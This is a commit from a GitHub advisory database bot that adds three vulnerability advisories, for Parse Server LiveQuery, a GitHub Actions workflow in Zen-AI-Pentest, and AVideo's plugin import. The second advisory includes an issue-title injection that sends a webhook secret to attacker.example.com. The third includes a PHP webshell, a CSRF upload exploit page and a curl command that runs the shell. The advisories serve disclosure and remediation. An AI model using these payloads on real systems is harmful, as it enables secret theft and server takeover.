Publish Advisories

advisory-database[bot] · advisory-database[bot] · commit 5405bdacd039 · 2026-03-20T21:49:14.000Z
GHSA-6qh5-m6g3-xhq6 GHSA-f67f-hcr6-94mf GHSA-hv36-p4w4-6vmj
diff --git a/advisories/github-reviewed/2026/03/GHSA-6qh5-m6g3-xhq6/GHSA-6qh5-m6g3-xhq6.json b/advisories/github-reviewed/2026/03/GHSA-6qh5-m6g3-xhq6/GHSA-6qh5-m6g3-xhq6.json
@@ -0,0 +1,84 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-6qh5-m6g3-xhq6",
+  "modified": "2026-03-20T21:48:17Z",
+  "published": "2026-03-20T21:48:17Z",
+  "aliases": [
+    "CVE-2026-33508"
+  ],
+  "summary": "Parse Server LiveQuery subscription query depth bypass",
+  "details": "### Impact\n\nParse Server's LiveQuery component does not enforce the `requestComplexity.queryDepth` configuration setting when processing WebSocket subscription requests. An attacker can send a subscription with deeply nested logical operators, causing excessive recursion and CPU consumption that degrades or disrupts service availability.\n\nDeployments are affected when the LiveQuery WebSocket endpoint is reachable by untrusted clients.\n\n### Patches\n\nThe fix adds query condition depth validation to the LiveQuery subscription handler, enforcing the same `requestComplexity.queryDepth` limit that already protects REST API queries.\n\n### Workarounds\n\nThere is no known workaround other than upgrading.",
+  "severity": [
+    {
+      "type": "CVSS_V4",
+      "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "npm",
+        "name": "parse-server"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "9.0.0"
+            },
+            {
+              "fixed": "9.6.0-alpha.45"
+            }
+          ]
+        }
+      ]
+    },
+    {
+      "package": {
+        "ecosystem": "npm",
+        "name": "parse-server"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": "8.6.56"
+            }
+          ]
+        }
+      ]
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/parse-community/parse-server/security/advisories/GHSA-6qh5-m6g3-xhq6"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/parse-community/parse-server/pull/10259"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/parse-community/parse-server/pull/10260"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/parse-community/parse-server"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-674"
+    ],
+    "severity": "HIGH",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-03-20T21:48:17Z",
+    "nvd_published_at": null
+  }
+}
diff --git a/advisories/github-reviewed/2026/03/GHSA-f67f-hcr6-94mf/GHSA-f67f-hcr6-94mf.json b/advisories/github-reviewed/2026/03/GHSA-f67f-hcr6-94mf/GHSA-f67f-hcr6-94mf.json
@@ -0,0 +1,59 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-f67f-hcr6-94mf",
+  "modified": "2026-03-20T21:47:37Z",
+  "published": "2026-03-20T21:47:37Z",
+  "aliases": [],
+  "summary": "Zen-AI-Pentest has Shell Injection via untrusted issue title in ZenClaw Discord Integration workflow",
+  "details": "## Summary\n\nThe `ZenClaw Discord Integration` GitHub Actions workflow is vulnerable to shell command injection. The issue title field, controllable by any GitHub user, is interpolated directly into a `run` shell block via a GitHub Actions template expression. An attacker can craft an issue title containing a subshell expression that executes arbitrary commands on the runner during variable assignment, enabling exfiltration of the `DISCORD_WEBHOOK_URL` secret. The trigger requires no repository privileges.\n\n## Affected Component\n\n**File:** `.github/workflows/zenclaw-discord.yml`  \n**Commit:** `07e65c72656a8213fc9ece2b3f4fc719032cfc5d`  \n**URL:** `https://github.com/SHAdd0WTAka/Zen-Ai-Pentest/blob/07e65c72656a8213fc9ece2b3f4fc719032cfc5d/.github/workflows/zenclaw-discord.yml`  \n**Step:** `Prepare Notification`  \n**Trigger:** `issues: [opened]` — no repository privileges required\n\n---\n\n## Description\n\nIn the `Prepare Notification` step, the issue title is assigned to a shell variable using direct GitHub Actions template interpolation inside a `case` block:\n\n```bash\nissues)\n  ...\n  DESCRIPTION=\"${{ github.event.issue.title }}\"\n  ;;\n```\n\nThe GitHub Actions template engine resolves `${{ github.event.issue.title }}` **at workflow compilation time**, embedding the raw issue title as literal text in the bash script before execution. The value is assigned inside a double-quoted string, which in bash evaluates subshell expressions of the form `$(...)` and backtick expressions `` `...` `` at runtime.\n\nAlthough a subsequent sanitization step is applied:\n\n```bash\nDESCRIPTION=$(echo \"$DESCRIPTION\" | tr '\\n' ' ' | cut -c1-1000)\n```\n\nThis sanitization runs **after** the assignment — the subshell in the title has already executed by the time `tr` and `cut` process the output. The sanitization is therefore ineffective as a security control against command injection.\n\nThe resulting `DESCRIPTION` value is then written to `$GITHUB_OUTPUT`:\n\n```bash\necho \"description=$DESCRIPTION\" >> $GITHUB_OUTPUT\n```\n\nThis additional write is performed without a multiline-safe delimiter, enabling a secondary `$GITHUB_OUTPUT` injection if the title contains a newline, which could overwrite downstream output variables such as `color` or `title`.\n\n---\n\n## Attack Vector\n\n1. Any GitHub user (no repository role required) opens an issue with a malicious title.\n2. The `issues: opened` trigger fires automatically — no human interaction or approval needed.\n3. The subshell expression in the title executes during variable assignment in the `Prepare Notification` step.\n4. The injected command runs with access to all secrets available to the runner.\n\n---\n\n## Proof of Concept\n\nAn attacker opens an issue with the following title:\n\n```\nbug$(curl -s \"https://attacker.example.com/exfil?wh=$(printenv DISCORD_WEBHOOK_URL | base64 -w0)\")\n```\n\nThe rendered bash assignment becomes:\n\n```bash\nDESCRIPTION=\"bug$(curl -s \"https://attacker.example.com/exfil?wh=$(printenv DISCORD_WEBHOOK_URL | base64 -w0)\")\"\n```\n\nThe subshell executes during assignment, sending the base64-encoded `DISCORD_WEBHOOK_URL` to the attacker's server before the sanitization step runs. The attacker can then use the stolen webhook URL to send arbitrary messages to the Discord channel impersonating the legitimate bot.\n\n---\n\n## Impact\n\n- **Confidentiality (High):** Exfiltration of `DISCORD_WEBHOOK_URL`, granting the attacker the ability to send arbitrary messages to the Discord channel indefinitely, impersonating the ZenClaw bot.\n- **Integrity (High):** With the webhook URL, an attacker can post false security alerts, fake workflow failure notifications, or misleading status updates to the Discord channel, potentially causing incident response actions based on fabricated data.\n- **Availability (None):** No direct availability impact.\n\n---\n\n## Recommended Fix\n\nPass all user-controlled event fields as environment variables and reference them via shell variables in the `run` block. Never use `${{ }}` expressions inside `run` blocks for user-controlled data.\n\n**Vulnerable pattern:**\n```yaml\nrun: |\n  DESCRIPTION=\"${{ github.event.issue.title }}\"\n```\n\n**Safe pattern — declare in `env:`, reference as shell variable:**\n```yaml\n- name: Prepare Notification\n  id: prep\n  env:\n    ISSUE_TITLE: ${{ github.event.issue.title }}\n    COMMIT_MSG: ${{ github.event.head_commit.message }}\n    WORKFLOW_NAME: ${{ github.event.workflow_run.name }}\n    DISPATCH_MSG: ${{ github.event.inputs.message }}\n    EVENT_ACTION: ${{ github.event.action }}\n    WORKFLOW_CONCLUSION: ${{ github.event.workflow_run.conclusion }}\n  run: |\n    case \"$EVENT\" in\n      issues)\n        DESCRIPTION=\"$ISSUE_TITLE\"\n        ;;\n      ...\n    esac\n    DESCRIPTION=$(echo \"$DESCRIPTION\" | tr '\\n' ' ' | cut -c1-1000)\n```\n\nWith values passed through `env:`, the Actions engine sets them as environment variables before the shell starts. Shell variable references (`$ISSUE_TITLE`) are expanded by bash at runtime without executing subshell expressions embedded in the value.\n\n---\n\n## References\n\n- [CWE-78: Improper Neutralization of Special Elements used in an OS Command (OS Command Injection)](https://cwe.mitre.org/data/definitions/78.html)\n- [GitHub Actions Security Hardening — Understand the risk of script injections](https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions#understanding-the-risk-of-script-injections)\n- [Keeping your GitHub Actions and workflows secure: Preventing pwn requests](https://securitylab.github.com/research/github-actions-preventing-pwn-requests/)",
+  "severity": [
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "GitHub Actions",
+        "name": "SHAdd0WTAka/Zen-Ai-Pentest"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "last_affected": "3.0.0"
+            }
+          ]
+        }
+      ]
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/SHAdd0WTAka/Zen-Ai-Pentest/security/advisories/GHSA-f67f-hcr6-94mf"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/SHAdd0WTAka/Zen-Ai-Pentest/commit/26c4e07df780f11b7e901ad2d88b3dc5ce8a1aca"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/SHAdd0WTAka/Zen-Ai-Pentest"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-78"
+    ],
+    "severity": "CRITICAL",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-03-20T21:47:37Z",
+    "nvd_published_at": null
+  }
+}
diff --git a/advisories/github-reviewed/2026/03/GHSA-hv36-p4w4-6vmj/GHSA-hv36-p4w4-6vmj.json b/advisories/github-reviewed/2026/03/GHSA-hv36-p4w4-6vmj/GHSA-hv36-p4w4-6vmj.json
@@ -0,0 +1,57 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-hv36-p4w4-6vmj",
+  "modified": "2026-03-20T21:47:50Z",
+  "published": "2026-03-20T21:47:50Z",
+  "aliases": [
+    "CVE-2026-33507"
+  ],
+  "summary": "AVideo Affected by CSRF on Plugin Import Endpoint Enables Unauthenticated Remote Code Execution via Malicious Plugin Upload",
+  "details": "## Summary\n\nThe `objects/pluginImport.json.php` endpoint allows admin users to upload and install plugin ZIP files containing executable PHP code, but lacks any CSRF protection. Combined with the application explicitly setting `session.cookie_samesite = 'None'` for HTTPS connections, an unauthenticated attacker can craft a page that, when visited by an authenticated admin, silently uploads a malicious plugin containing a PHP webshell, achieving Remote Code Execution on the server.\n\n## Details\n\nThe root cause has two components working together:\n\n**1. SameSite=None on session cookies (`objects/include_config.php:134-137`):**\n\n```php\nif ($isHTTPS) {\n    ini_set('session.cookie_samesite', 'None');\n    ini_set('session.cookie_secure', '1');\n}\n```\n\nThis explicitly allows browsers to include the session cookie on cross-origin requests to the AVideo instance.\n\n**2. No CSRF protection on pluginImport.json.php (`objects/pluginImport.json.php:18`):**\n\n```php\nif (!User::isAdmin()) {\n    $obj->msg = \"You are not admin\";\n    die(json_encode($obj));\n}\n```\n\nThe endpoint only checks `User::isAdmin()` via the session. There is:\n- No CSRF token validation (the `verifyToken`/`globalToken` mechanism used elsewhere is absent)\n- No `allowOrigin()` call (contrast with `objects/videoAddNew.json.php` which calls `allowOrigin()` at line 8)\n- No `Referer` or `Origin` header validation\n- No requirement for custom headers (e.g., `X-Requested-With`)\n\nThe upload form at `view/managerPluginUpload.php` also contains no CSRF token — it's a plain `<form enctype=\"multipart/form-data\">` with a file input.\n\n**Why the attack bypasses CORS preflight:** `multipart/form-data` is a CORS-safelisted Content-Type, so a `fetch()` call with `mode: 'no-cors'` and `credentials: 'include'` sends the request directly without an OPTIONS preflight. The attacker cannot read the response, but the side effect — plugin installation and PHP file extraction to the web-accessible `plugin/` directory — is the objective.\n\n**Why secondary PHP files are not validated:** The ZIP validation (lines 67-152) thoroughly checks for path traversal, dangerous extensions (`.phtml`, `.phar`, `.sh`, etc.), and verifies the main plugin file extends `PluginAbstract`. However, `.php` is intentionally not in the `dangerousExtensions` list (it's a plugin system), and only the main file (`PluginName/PluginName.php`) is checked for the `PluginAbstract` pattern. Any additional `.php` files in the ZIP are extracted without content inspection.\n\n## PoC\n\n**Step 1: Create the malicious plugin ZIP**\n\n```bash\nmkdir -p EvilPlugin\n# Main file — passes PluginAbstract validation\ncat > EvilPlugin/EvilPlugin.php << 'PLUG'\n<?php\nclass EvilPlugin extends PluginAbstract {\n    public function getTags() { return array(); }\n    public function getDescription() { return \"test\"; }\n    public function getName() { return \"EvilPlugin\"; }\n    public function getUUID() { return \"evil-0000-0000-0000\"; }\n    public function getPluginVersion() { return \"1.0\"; }\n    public function getEmptyDataObject() { return new stdClass(); }\n}\nPLUG\n\n# Secondary file — webshell, NOT checked for PluginAbstract\ncat > EvilPlugin/cmd.php << 'SHELL'\n<?php if(isset($_GET['c'])) system($_GET['c']); ?>\nSHELL\n\nzip -r evil-plugin.zip EvilPlugin/\n```\n\n**Step 2: Host the CSRF exploit page**\n\n```html\n<!DOCTYPE html>\n<html>\n<body>\n<h1>Loading...</h1>\n<script>\n// Minimal ZIP with EvilPlugin/EvilPlugin.php and EvilPlugin/cmd.php\n// In practice, the attacker would embed the base64-encoded ZIP bytes here\nasync function exploit() {\n    const zipResp = await fetch('evil-plugin.zip');\n    const zipBlob = await zipResp.blob();\n\n    const formData = new FormData();\n    formData.append('input-b1', zipBlob, 'evil-plugin.zip');\n\n    fetch('https://TARGET_AVIDEO_INSTANCE/objects/pluginImport.json.php', {\n        method: 'POST',\n        body: formData,\n        mode: 'no-cors',\n        credentials: 'include'\n    });\n}\nexploit();\n</script>\n</body>\n</html>\n```\n\n**Step 3: Admin visits attacker's page while logged into AVideo over HTTPS**\n\nThe browser sends the multipart/form-data POST with the admin's `PHPSESSID` cookie (allowed by `SameSite=None`). The server processes the upload, validates the ZIP structure, and extracts it to `plugin/EvilPlugin/`.\n\n**Step 4: Attacker accesses the webshell**\n\n```bash\ncurl 'https://TARGET_AVIDEO_INSTANCE/plugin/EvilPlugin/cmd.php?c=id'\n# uid=33(www-data) gid=33(www-data) groups=33(www-data)\n```\n\n## Impact\n\n- **Remote Code Execution:** An unauthenticated attacker achieves arbitrary OS command execution on the AVideo server by exploiting a logged-in admin's session.\n- **Full server compromise:** The webshell runs as the web server user (`www-data`), enabling data exfiltration, lateral movement, database access, and further privilege escalation.\n- **No attacker account needed:** The attacker requires zero privileges on the target system — only that an admin visits a page they control.\n- **Stealth:** The attack is invisible to the admin (fire-and-forget side-effect request). The `no-cors` mode means no visible error or redirect.\n\n## Recommended Fix\n\n**1. Add CSRF token validation to `objects/pluginImport.json.php`** (primary fix):\n\n```php\n// After the isAdmin() check at line 18, add:\nif (!User::isAdmin()) {\n    $obj->msg = \"You are not admin\";\n    die(json_encode($obj));\n}\n\n// Add CSRF protection\nallowOrigin();\n\n// Also validate a CSRF token\nif (empty($_POST['globalToken']) || !verifyToken($_POST['globalToken'])) {\n    $obj->msg = \"Invalid CSRF token\";\n    die(json_encode($obj));\n}\n```\n\n**2. Update the upload form in `view/managerPluginUpload.php`** to include the token:\n\n```html\n<form enctype=\"multipart/form-data\">\n    <input type=\"hidden\" name=\"globalToken\" value=\"<?php echo getToken(); ?>\">\n    <input id=\"input-b1\" name=\"input-b1\" type=\"file\" class=\"\">\n</form>\n```\n\nAnd pass it in the JavaScript upload config:\n\n```javascript\n$('#input-b1').fileinput({\n    uploadUrl: webSiteRootURL + 'objects/pluginImport.json.php',\n    uploadExtraData: { globalToken: $('input[name=globalToken]').val() },\n    // ...\n});\n```\n\n**3. Consider changing `SameSite=None` to `SameSite=Lax`** unless cross-origin cookie inclusion is specifically required for application functionality. `Lax` prevents cross-site POST requests from including cookies, which would mitigate this and similar CSRF vectors application-wide.",
+  "severity": [
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "Packagist",
+        "name": "wwbn/avideo"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "last_affected": "26.0"
+            }
+          ]
+        }
+      ]
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-hv36-p4w4-6vmj"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/WWBN/AVideo"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-352"
+    ],
+    "severity": "HIGH",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-03-20T21:47:50Z",
+    "nvd_published_at": null
+  }
+}
